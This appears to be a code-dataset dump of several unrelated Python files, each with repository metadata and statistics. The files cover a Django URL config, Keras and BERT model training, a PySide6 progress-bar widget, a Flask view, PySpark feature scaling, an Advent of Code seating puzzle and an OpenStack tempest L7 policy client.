| 24.844 | 88 | 0.551924 | 1,045 | 6,211 | 3.186603 | 0.116746 | 0.054655 | 0.031532 | 0.045045 | 0.578078 | 0.478679 | 0.404805 | 0.348048 | 0.241742 | 0.18979 | 0 | 0.062683 | 0.285944 | 6,211 | 249 | 89 | 24.943775 | 0.688162 | 0.085976 | 0 | 0.301887 | 0 | 0 | 0.005659 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056604 | false | 0 | 0.037736 | 0 | 0.157233 | 0.018868 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d48337c78ce2e640508a61a6350b194e4ad2ee | 507 | py | Python | backend/product/urls.py | kmrul/Grocery-Store | a8abc99d66daf7c1dbf42a5bb9b563bda98b9e3c | [
"MIT"
] | null | null | null | backend/product/urls.py | kmrul/Grocery-Store | a8abc99d66daf7c1dbf42a5bb9b563bda98b9e3c | [
"MIT"
] | null | null | null | backend/product/urls.py | kmrul/Grocery-Store | a8abc99d66daf7c1dbf42a5bb9b563bda98b9e3c | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('product/', views.apiOverview, name='overview'),
path('product/list/', views.productList, name='product-list'),
path('product/detail/<str:pk>', views.productDetail, name='product-detail'),
path('product/create', views.productCreate, name='product-create'),
path('product/update/<str:pk>', views.productUpdate, name='product-update'),
path('product/delete/<str:pk>', views.productDelete, name='product-delete'),
] | 46.090909 | 80 | 0.706114 | 61 | 507 | 5.868852 | 0.377049 | 0.184358 | 0.083799 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106509 | 507 | 11 | 81 | 46.090909 | 0.790287 | 0 | 0 | 0 | 0 | 0 | 0.354331 | 0.135827 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d4c378e92d06b8248254af3ada493cd9a99613 | 1,512 | py | Python | Train.py | jinsuyun/DriavablaMap_Segmentation | 8537f19f007f064ca2ab3a91bd25c714ecb50a48 | [
"BSD-3-Clause"
] | null | null | null | Train.py | jinsuyun/DriavablaMap_Segmentation | 8537f19f007f064ca2ab3a91bd25c714ecb50a48 | [
"BSD-3-Clause"
] | null | null | null | Train.py | jinsuyun/DriavablaMap_Segmentation | 8537f19f007f064ca2ab3a91bd25c714ecb50a48 | [
"BSD-3-Clause"
] | null | null | null | from tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler, TensorBoard
import tensorflow as tf
import Data
import Model
# import myslack
import os
import argparse
from tensorflow.python.client import device_lib
import warnings
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser(description='PyTorch Training')
parser.add_argument('--gpus', default='3', type=str, help='Which GPUs you want to use? (0,1,2,3)')
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpus
# myslack.send_slack("start")
# path = 'D:/Models/'
path = 'Models/gpu2/'
# path = 'Models/'
#gpus = tf.config.experimental.list_logical_devices('GPUS')
#if gpus:
# tf.config.experimental.set_memory_growth(gpus[0], True)
def scheduler(epoch):
warmup = 3
warmup_lr = 1e-5 # 0.00001
threshold = 15
lr = 1e-4 # 0.0001
lr2 = 5e-5 # 0.00005
if epoch < warmup:
return warmup_lr
elif epoch == warmup:
return (lr + warmup_lr) / 2
elif epoch < threshold:
return lr
else:
return lr2
callback = [
ModelCheckpoint(path + 'model_{epoch:02d}-{val_iou_acc:.4f}_{iou_acc:.4f}.h5'),
LearningRateScheduler(scheduler, verbose=1),
# TensorBoard('./logs/', profile_batch=2)
]
#with tf.device('/XLA_GPU:0'):
b = 4
tr_batch = Data.Load_tr(batch_size=b)
te_batch = Data.Load_te(batch_size=b)
print(tr_batch)
c = 3
model = Model.SegModel(3)
model.load()
model.fit(tr_batch, te_batch, callback)
# myslack.send_slack("finish")
| 25.627119 | 98 | 0.703042 | 215 | 1,512 | 4.804651 | 0.497674 | 0.027106 | 0.030978 | 0.046467 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037125 | 0.162698 | 1,512 | 58 | 99 | 26.068966 | 0.778831 | 0.214286 | 0 | 0 | 0 | 0 | 0.127768 | 0.044293 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025 | false | 0 | 0.2 | 0 | 0.325 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d52e44864bf1ce0a5095905d078b5ae85da8b7 | 3,470 | py | Python | ui/custom_pb/custompb.py | magnusjwatson2786/Container-GUI | 42cbe1bb970fbabe5b5fde873425f262e9207d30 | [
"MIT"
] | null | null | null | ui/custom_pb/custompb.py | magnusjwatson2786/Container-GUI | 42cbe1bb970fbabe5b5fde873425f262e9207d30 | [
"MIT"
] | null | null | null | ui/custom_pb/custompb.py | magnusjwatson2786/Container-GUI | 42cbe1bb970fbabe5b5fde873425f262e9207d30 | [
"MIT"
] | null | null | null | from PySide6.QtCore import *
from PySide6.QtGui import *
from PySide6.QtWidgets import *
class CustomPb(QWidget):
def __init__(
self,
value = 0,
progress_width = 2,
# progress_length= 500,
is_rounded = False,
max_value = 100,
progress_color = "#ff79c6",
enable_text = True,
font_family = "Segoe UI",
font_size = 12,
suffix = "%",
text_color = "#ff79c6",
enable_bg = True,
bg_color = "#44475a"
):
QWidget.__init__(self)
# CUSTOM PROPERTIES
self.value = value
self.progress_width = progress_width
# self.progress_length = progress_length
self.progress_rounded_cap = is_rounded
self.max_value = max_value
self.progress_color = progress_color
# Text
self.enable_text = enable_text
self.font_family = font_family
self.font_size = font_size
self.suffix = suffix
self.text_color = text_color
# BG
self.enable_bg = enable_bg
self.bg_color = bg_color
# ADD DROPSHADOW
def add_shadow(self, enable):
if enable:
self.shadow = QGraphicsDropShadowEffect(self)
self.shadow.setBlurRadius(15)
self.shadow.setXOffset(0)
self.shadow.setYOffset(0)
self.shadow.setColor(QColor(0, 0, 0, 80))
self.setGraphicsEffect(self.shadow)
# SET VALUE
def setValue(self, value):
self.value = value
self.repaint() # Render progress bar after change value
# PAINT EVENT (DESIGN YOUR CIRCULAR PROGRESS HERE)
def paintEvent(self, e):
# SET PROGRESS PARAMETERS
width = self.width() - self.progress_width
height = self.height() - self.progress_width
margin = self.progress_width / 2
y=0.75*self.height()+margin
value = (self.value / self.max_value) * width
# length = self.progress_length
# PAINTER
paint = QPainter()
paint.begin(self)
paint.setRenderHint(QPainter.Antialiasing) # remove pixelated edges
paint.setFont(QFont(self.font_family, self.font_size))
# CREATE RECTANGLE for the text value
# rect = QRect(0, 0, self.width(), self.height())
rect = QRect(self.width()/4, self.height()/4, self.width()/2, self.height()/2)
paint.setPen(Qt.NoPen)
# PEN
pen = QPen()
pen.setWidth(self.progress_width)
# Set Round Cap
if self.progress_rounded_cap:
pen.setJoinStyle(Qt.RoundJoin)
else:
pen.setJoinStyle(Qt.MiterJoin)
# ENABLE BG
if self.enable_bg:
pen.setColor(QColor(self.bg_color))
paint.setPen(pen)
paint.drawRect(margin, y ,width ,self.progress_width )
# CREATE ARC / CIRCULAR PROGRESS
pen.setColor(QColor(self.progress_color))
paint.setPen(pen)
paint.drawRect(margin, y ,value ,self.progress_width )
# CREATE TEXT
if self.enable_text:
pen.setColor(QColor(self.text_color))
pen.setWidth(40)
font = QFont()
# print(font.pointSize())
font.setPointSize(12)
paint.setFont(font)
paint.setPen(pen)
paint.drawText(rect, Qt.AlignCenter, f"{self.value}{self.suffix}")
# END
paint.end() | 31.545455 | 86 | 0.583285 | 391 | 3,470 | 5.023018 | 0.286445 | 0.07943 | 0.060591 | 0.032077 | 0.062118 | 0.039715 | 0.039715 | 0.039715 | 0 | 0 | 0 | 0.019907 | 0.319597 | 3,470 | 110 | 87 | 31.545455 | 0.811944 | 0.134582 | 0 | 0.064935 | 0 | 0 | 0.01845 | 0.008386 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051948 | false | 0 | 0.038961 | 0 | 0.103896 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d52f169921ab9efb57ff8c6c57b8de676e6dfb | 1,301 | py | Python | camhudson/views/index.py | Hudson00/Hudson00.github.io | 75fede08521dc1e10cb2ce29e20c54c93e9e6db6 | [
"MIT"
] | null | null | null | camhudson/views/index.py | Hudson00/Hudson00.github.io | 75fede08521dc1e10cb2ce29e20c54c93e9e6db6 | [
"MIT"
] | null | null | null | camhudson/views/index.py | Hudson00/Hudson00.github.io | 75fede08521dc1e10cb2ce29e20c54c93e9e6db6 | [
"MIT"
] | null | null | null | """Cam Hudson Personal Website app's index.html view.
URLs handled in this file include:
/
"""
from flask import render_template, session
from camhudson.views.utility import create_index_card # Make linter shut up
import camhudson
@camhudson.app.route('/', methods=['GET'])
@camhudson.app.route('/index.html', methods=['GET'])
def get_index() -> str:
"""Handle request for homepage."""
context = {
'cards': [
create_index_card(
'Bio',
'Take a few moments to learn a little about Cam!',
'/bio',
'/static/images/cam.png',
'Cam Hudson selfie'
),
create_index_card(
'Résumé',
'Dive into Cam\'s skills, education, and work history!',
'/hudson-resume.pdf\" target=\"_blank',
'/static/images/joao-ferrao-resume.png',
'Resume on desk'
),
create_index_card(
'Contact',
'Find out how you can get in touch with Cam!',
'contact-info',
'/static/images/elizaveta-kushnirenko-mailbox.png',
'Mailbox',
)
]
}
return render_template('index.html', **context)
| 32.525 | 76 | 0.530361 | 138 | 1,301 | 4.913043 | 0.615942 | 0.064897 | 0.088496 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.346656 | 1,301 | 39 | 77 | 33.358974 | 0.797647 | 0.106072 | 0 | 0.15625 | 0 | 0 | 0.316247 | 0.092963 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.09375 | 0 | 0.15625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d5d7d712b3b2f871108b46b0de197890de0365 | 2,661 | py | Python | ai_services/anomaly_detection/data_preprocessing_examples/oci_data_flow_based_examples/example_code/normalization.py | oracle-samples/oci-data-science-ai-samples | 3128787c1347a17f9dc2194f1a16a500ed08eb8e | [
"UPL-1.0",
"Apache-2.0"
] | null | null | null | ai_services/anomaly_detection/data_preprocessing_examples/oci_data_flow_based_examples/example_code/normalization.py | oracle-samples/oci-data-science-ai-samples | 3128787c1347a17f9dc2194f1a16a500ed08eb8e | [
"UPL-1.0",
"Apache-2.0"
] | null | null | null | ai_services/anomaly_detection/data_preprocessing_examples/oci_data_flow_based_examples/example_code/normalization.py | oracle-samples/oci-data-science-ai-samples | 3128787c1347a17f9dc2194f1a16a500ed08eb8e | [
"UPL-1.0",
"Apache-2.0"
] | 2 | 2022-03-28T07:27:28.000Z | 2022-03-28T21:18:36.000Z | from pyspark.sql import SparkSession
from pyspark.sql import functions as F
import argparse
from pyspark.ml.feature import MinMaxScaler, StandardScaler, VectorAssembler
def extract(row):
return (row.id,) + tuple(row.scaledFeatures.toArray().tolist()[:-1])
def normalize_data(df, scaler_type, columns):
"""
Scale numeric features using two methods
1) minmax normalization or
2) standardization
Args:
df: input dataframe
scaler_type: either "minmax" or "standard"
columns: columns to be scaled/ normalized
Return:
Scaled dataframe
"""
columns = (
[col for col in df.columns if col not in {"id", "timestamp"}]
if not columns
else columns
)
not_normalized_columns = list(set(df.columns).difference(set(columns)))
df = df.withColumn("id", F.monotonically_increasing_id())
columns += ["id"]
not_normalized_columns += ["id"]
assembler = VectorAssembler().setInputCols(
columns).setOutputCol("features")
transformed = assembler.transform(df.select(columns))
if scaler_type == "minmax":
scaler = MinMaxScaler(inputCol="features", outputCol="scaledFeatures")
elif scaler_type == "standard":
scaler = StandardScaler(
inputCol="features",
outputCol="scaledFeatures")
else:
raise ValueError("Invalid scaler type")
scalerModel = scaler.fit(transformed.select("features"))
scaledData = scalerModel.transform(transformed)
scaledData = (
scaledData.select(["id", "scaledFeatures"])
.rdd.map(extract)
.toDF(["id"] + columns[:-1])
)
return df.select(not_normalized_columns).join(
scaledData,
on="id").drop("id")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--input", required=True)
parser.add_argument("--output", required=True)
parser.add_argument("--norm", required=True)
parser.add_argument("--columns", nargs="+", required=True)
parser.add_argument("--coalesce", required=False, action="store_true")
args = parser.parse_args()
columns = args.columns[0].split(
" ") if len(args.columns) == 1 else args.columns
spark = SparkSession.builder.appName("DataFlow").getOrCreate()
input_data = spark.read.csv(
args.input,
sep=",",
inferSchema=True,
header=True)
input_data_scaled = normalize_data(input_data, args.norm, columns)
if args.coalesce:
input_data_scaled.coalesce(1).write.csv(args.output, header=True)
else:
input_data_scaled.write.csv(args.output, header=True)
| 33.2625 | 78 | 0.658023 | 295 | 2,661 | 5.810169 | 0.386441 | 0.029172 | 0.049592 | 0.049008 | 0.10035 | 0.032672 | 0 | 0 | 0 | 0 | 0 | 0.003349 | 0.214581 | 2,661 | 79 | 79 | 33.683544 | 0.816746 | 0.092822 | 0 | 0.034483 | 0 | 0 | 0.084954 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.068966 | 0.017241 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d71f0a51d5a31acbe4cd401e05ee26f9010239 | 3,051 | py | Python | deep_morphology/models/bert_tagger.py | juditacs/deep-morphology | 090c17e604499a3430ea835a6340fa3abdc6ea83 | [
"MIT"
] | 3 | 2019-10-16T12:25:37.000Z | 2021-01-16T00:31:37.000Z | deep_morphology/models/bert_tagger.py | juditacs/deep-morphology | 090c17e604499a3430ea835a6340fa3abdc6ea83 | [
"MIT"
] | 15 | 2018-09-12T20:26:44.000Z | 2018-11-09T20:10:37.000Z | deep_morphology/models/bert_tagger.py | juditacs/deep-morphology | 090c17e604499a3430ea835a6340fa3abdc6ea83 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2019 Judit Acs <judit@sch.bme.hu>
#
# Distributed under terms of the MIT license.
import torch
import torch.nn as nn
from pytorch_pretrained_bert import BertModel
from deep_morphology.models.base import BaseModel
from deep_morphology.models.seq2seq import compute_sequence_loss
from deep_morphology.models.mlp import MLP
use_cuda = torch.cuda.is_available()
def to_cuda(var):
if use_cuda:
return var.cuda()
return var
class BERTTagger(BaseModel):
def __init__(self, config, dataset):
super().__init__(config)
self.dataset = dataset
self.output_size = len(dataset.vocabs.pos)
model_name = getattr(self.config, 'bert_model', 'bert-base-multilingual-cased')
self.bert = BertModel.from_pretrained(model_name)
self.bert_layer = self.config.bert_layer
bert_size = 768 if 'base' in model_name else 1024
n_layer = 12 if 'base' in model_name else 24
if self.bert_layer == 'weighted_sum':
self.bert_weights = nn.Parameter(torch.ones(n_layer, dtype=torch.float))
if hasattr(self.config, 'lstm_size'):
self.lstm = nn.LSTM(
bert_size, self.config.lstm_size, batch_first=True,
dropout=self.config.dropout,
num_layers=self.config.lstm_num_layers,
bidirectional=True)
hidden_size = self.config.lstm_size * 2
else:
self.lstm = None
hidden_size = bert_size
if self.bert_layer == 'weighted_sum':
self.bert_weights = nn.Parameter(torch.ones(n_layer, dtype=torch.float))
self.output_proj = nn.Linear(hidden_size, self.output_size)
self.output_proj = MLP(
input_size=bert_size,
layers=self.config.mlp_layers,
nonlinearity=self.config.mlp_nonlinearity,
output_size=self.output_size,
)
# ignore <pad> = 3
self.criterion = nn.CrossEntropyLoss(
ignore_index=self.dataset.vocabs.pos['<pad>'])
for param in self.bert.parameters():
param.requires_grad = False
def compute_loss(self, batch, output):
target = to_cuda(torch.LongTensor(batch.pos))
return compute_sequence_loss(target, output, self.criterion)
def forward(self, batch):
X = to_cuda(torch.LongTensor(batch.sentence))
mask = torch.arange(X.size(1)) < torch.LongTensor(batch.sentence_len).unsqueeze(1)
mask = to_cuda(mask.long())
bert_out, _ = self.bert(X, attention_mask=mask)
if self.bert_layer == 'mean':
bert_out = torch.stack(bert_out).mean(0)
elif self.bert_layer == 'weighted_sum':
bert_out = (
self.bert_weights[:, None, None, None] * torch.stack(bert_out)).sum(0)
else:
bert_out = bert_out[self.bert_layer]
if self.lstm:
bert_out = self.lstm(bert_out)[0]
return self.output_proj(bert_out)
| 36.321429 | 90 | 0.640118 | 402 | 3,051 | 4.646766 | 0.318408 | 0.051392 | 0.041756 | 0.038544 | 0.174518 | 0.110278 | 0.087794 | 0.087794 | 0.087794 | 0.087794 | 0 | 0.010979 | 0.253687 | 3,051 | 83 | 91 | 36.759036 | 0.808959 | 0.054081 | 0 | 0.09375 | 0 | 0 | 0.034746 | 0.009729 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.09375 | 0 | 0.234375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d7838cf86895dbb3bc71349d1a986ae126e5e6 | 4,246 | py | Python | python3/11.py | mn113/adventofcode2020 | 87e3062948444627eb95e1b81e8d1b6db9640ba0 | [
"MIT"
] | null | null | null | python3/11.py | mn113/adventofcode2020 | 87e3062948444627eb95e1b81e8d1b6db9640ba0 | [
"MIT"
] | null | null | null | python3/11.py | mn113/adventofcode2020 | 87e3062948444627eb95e1b81e8d1b6db9640ba0 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
part = 1
def read_input():
with open('../inputs/input11.txt') as fp:
lines = fp.readlines()
return [line.strip() for line in lines]
class Seat:
def __init__(self, x, y, state):
self.x = x
self.y = y
self.state = state
def __str__(self):
return self.state
def isEdge(self):
return self.state in '_|'
def isFloor(self):
return self.state == '.'
def isEmptySeat(self):
return self.state == 'L'
def isFilledSeat(self):
return self.state == '#'
# @returns Seat[]
def neighbours(self):
global seating
neighbs = {
'W': seating[self.y][self.x - 1],
'E': seating[self.y][self.x + 1],
'S': seating[self.y + 1][self.x],
'N': seating[self.y - 1][self.x],
'NW': seating[self.y - 1][self.x - 1],
'SW': seating[self.y + 1][self.x - 1],
'NE': seating[self.y - 1][self.x + 1],
'SE': seating[self.y + 1][self.x + 1]
}
return list(neighbs.values())
# @returns Seat[]
def line_of_sight_seats(self):
dirs = {
'N': (-1,0),
'NE': (-1,1),
'E': (0,1),
'SE': (1,1),
'S': (1,0),
'SW': (1,-1),
'W': (0,-1),
'NW': (-1,-1)
}
# look for first filled, empty or edge seat in a direction
def look_at_seat(direction):
pos = (self.y, self.x)
# do not take more than d steps from original pos
while 1:
pos = (pos[0] + direction[0], pos[1] + direction[1])
seat = seating[pos[0]][pos[1]]
if not seat.isFloor():
return seat
return [look_at_seat(direction) for direction in list(dirs.values())]
def get_new_state(self):
# skip floors and edges
if self.isEdge() or self.isFloor():
return self.state
if part == 1:
tolerance = 4
filled_neighbours = [nb for nb in self.neighbours() if nb.isFilledSeat()]
else:
tolerance = 5
filled_neighbours = [nb for nb in self.line_of_sight_seats() if nb.isFilledSeat()]
# node empty and no filled neighbs -> filled
if self.isEmptySeat() and len(filled_neighbours) == 0:
return '#'
# node filled and 4+ filled neighbs -> empty
elif self.isFilledSeat() and len(filled_neighbours) >= tolerance:
return 'L'
return self.state
# generate string snapshot of current seating area, for state comparison
# @returns {String}
def hash_seating(seating):
return "".join(["".join([str(seat) for seat in row]) for row in seating])
# pad grid with | and _ to avoid out-of-bounds errors:
# @param {string[]} grid
def pad_grid(grid):
pgrid = []
# sides
for y in range(len(grid)):
pgrid += ["|" + grid[y] + "|"]
# top, bottom
horiz = "_" * len(pgrid[0])
return [horiz] + pgrid + [horiz]
diagram = pad_grid(read_input())
# set up two 2D arrays, for current and next state
seating = []
next_seating = []
# fill initial seating
for y, line in enumerate(diagram):
seating += [[]]
for x, char in enumerate(line):
seating[y] += [Seat(x, y, char)]
# one iteration of time
def run_step(i):
global seating, next_seating
# new empty seating before filling from current
next_seating = []
# fill next_seating
for y, row in enumerate(seating):
next_seating += [[]]
for x, seat in enumerate(row):
next_seating[y] += [Seat(seat.x, seat.y, seat.get_new_state())]
# run time and keep comparing hashes to detect stable state
i = 0
while 1:
i += 1
run_step(i)
# progress...
if i % 20 == 0:
print(i, hash_seating(next_seating))
if hash_seating(seating) == hash_seating(next_seating):
# part 1 - number of full seats, once stable - 2183
# part 2 - same - 1990
print(hash_seating(seating).count("#"), "full seats")
break
else:
# shift seating states before next loop
seating, next_seating = next_seating, []
| 27.217949 | 94 | 0.542393 | 560 | 4,246 | 4.023214 | 0.275 | 0.024412 | 0.04261 | 0.034621 | 0.110963 | 0.091434 | 0.059476 | 0 | 0 | 0 | 0 | 0.02152 | 0.321479 | 4,246 | 155 | 95 | 27.393548 | 0.7605 | 0.18488 | 0 | 0.090909 | 0 | 0 | 0.019203 | 0.00611 | 0 | 0 | 0 | 0 | 0 | 1 | 0.141414 | false | 0 | 0 | 0.060606 | 0.30303 | 0.020202 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d7bf8fa8ad6da40c52b2f23d769cd6c11b59ae | 2,667 | py | Python | f5lbaasdriver/test/tempest/services/clients/l7policy_client.py | fsckss/f5-openstack-lbaasv2-driver | 678724d5b1eadad89a774af6d5e073512ba4998c | [
"Apache-2.0"
] | null | null | null | f5lbaasdriver/test/tempest/services/clients/l7policy_client.py | fsckss/f5-openstack-lbaasv2-driver | 678724d5b1eadad89a774af6d5e073512ba4998c | [
"Apache-2.0"
] | null | null | null | f5lbaasdriver/test/tempest/services/clients/l7policy_client.py | fsckss/f5-openstack-lbaasv2-driver | 678724d5b1eadad89a774af6d5e073512ba4998c | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
u"""F5 Networks® LBaaSv2 L7 rules client for tempest tests."""
# Copyright 2016 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_serialization import jsonutils
from six.moves.urllib import parse
from tempest.lib.common import rest_client
class L7PolicyClientJSON(rest_client.RestClient):
"""Tests L7 Policies API."""
def list_l7policies(self, params=None):
"""List all L7 policies."""
url = 'v2.0/lbaas/l7policies.json'
if params:
url = "{0}?{1}".format(url, parse.urlencode(params))
resp, body = self.get(url)
body = jsonutils.loads(body)
self.expected_success(200, resp.status)
return rest_client.ResponseBodyList(resp, body['l7policies'])
def get_l7policy(self, policy_id, params=None):
"""Get L7 policy."""
url = 'v2.0/lbaas/l7policies/{0}'.format(policy_id)
if params:
url = '{0}?{1}'.format(url, parse.urlencode(params))
resp, body = self.get(url)
body = jsonutils.loads(body)
self.expected_success(200, resp.status)
return rest_client.ResponseBody(resp, body["l7policy"])
def create_l7policy(self, **kwargs):
"""Create L7 policy."""
url = 'v2.0/lbaas/l7policies.json'
post_body = jsonutils.dumps({"l7policy": kwargs})
resp, body = self.post(url, post_body)
body = jsonutils.loads(body)
self.expected_success(201, resp.status)
return rest_client.ResponseBody(resp, body["l7policy"])
def update_l7policy(self, policy_id, **kwargs):
"""Update L7 policy."""
url = 'v2.0/lbaas/l7policies/{0}'.format(policy_id)
put_body = jsonutils.dumps({"l7policy": kwargs})
resp, body = self.put(url, put_body)
body = jsonutils.loads(body)
self.expected_success(200, resp.status)
return rest_client.ResponseBody(resp, body["l7policy"])
def delete_l7policy(self, policy_id):
"""Delete L7 policy."""
url = 'v2.0/lbaas/l7policies/{0}'.format(policy_id)
resp, body = self.delete(url)
self.expected_success(204, resp.status)
| 39.220588 | 76 | 0.662542 | 354 | 2,667 | 4.918079 | 0.367232 | 0.041356 | 0.017231 | 0.031591 | 0.445721 | 0.445721 | 0.429064 | 0.412407 | 0.333716 | 0.333716 | 0 | 0.032474 | 0.214848 | 2,667 | 67 | 77 | 39.80597 | 0.798472 | 0.27934 | 0 | 0.487179 | 0 | 0 | 0.101975 | 0.067806 | 0 | 0 | 0 | 0 | 0 | 1 | 0.128205 | false | 0 | 0.076923 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |